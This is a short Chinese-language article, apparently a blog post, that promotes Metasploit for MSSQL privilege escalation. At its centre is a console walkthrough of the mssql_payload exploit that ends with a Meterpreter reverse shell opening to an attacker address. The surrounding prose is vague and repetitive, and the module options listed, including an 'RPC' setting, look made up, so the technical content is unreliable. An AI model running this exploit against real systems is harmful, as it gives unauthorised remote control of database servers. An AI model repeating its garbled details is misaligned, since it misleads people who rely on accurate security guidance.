MSF神器突破难关，挖掘MSSQL提权之路（msf破解mssql提权）

当对抗网络攻击时，管理员不得不深入了解威胁的数据库,例如MSSQL，以便发现攻击者在发起攻击时访问的数据库;而安全工作者也要求其他组织掌握当前面临威胁的管理数据库。但威胁管理不仅仅是检查数据库;它也包括在应用程序、数据库和系统管理程序中浏览数据，学习其功能，了解可以利用的服务等。

Metasploit是一款开源的强大的框架，可以实现安全性测试、安全扫描和POC挖掘，进而突破攻击者与目标系统之间的安全壁垒。特别是在MSSQL的提权过程中，MSF提供了很多有用的模块，可以让我们更加清楚地了解本地数据库，也可以用于在多实例数据库系统中测试安全性，从而开发出更加强大的攻击手段。

MSF模块不仅能够实现数据库指纹识别，还可以帮助安全工作者检测环境中的攻击技术，通过MSF可以自动化地发现，这有利于发现有漏洞的数据库，此外，还提供实用的模块，可以在不同形式的数据库中检测特定类型的漏洞，从而获取有效的代码。

MSF还支持用户使用ruby脚本，实现攻击手段的自动化，实现数据库访问。以下为一个常见的MSSQL DB提权示例：

# Use exploit/windows/mssql/mssql_payload 
msf exploit(mssql_payload) > show options

Module options (exploit/windows/mssql/mssql_payload):

Name    Current Setting  Required  Description
----    ---------------  --------  -----------
RHOST   172.26.11.134   yes       The target address
RPC    YES             yes       Use RPC for communication
# 设置RHOST
msf exploit(mssql_payload) > set RHOST 172.26.11.134
RHOST => 172.26.11.134

#设置RPC为yes
msf exploit(mssql_payload) > set RPC yes
RPC => yes

#选择exploit
msf exploit(mssql_payload) > exploit 
[+] Sending stage (748736 bytes) to 172.26.11.134
[+] Meterpreter session 1 opened (172.26.11.139:4444 -> 172.26.11.134:1563) at 2020-08-17 07:07:37 -0400
meterpreter > 

MSF能够提升攻击结果的定位和准确率，进而提高安全等级。MSF可以快速分析不安全的数据库，以此判断攻击者可以利用的手段，进而采取有效的预防措施，避免受到破坏和数据失窃攻击。因此，安全工作者应该熟悉并利用MSF框架，用来与数据库的提权过程中。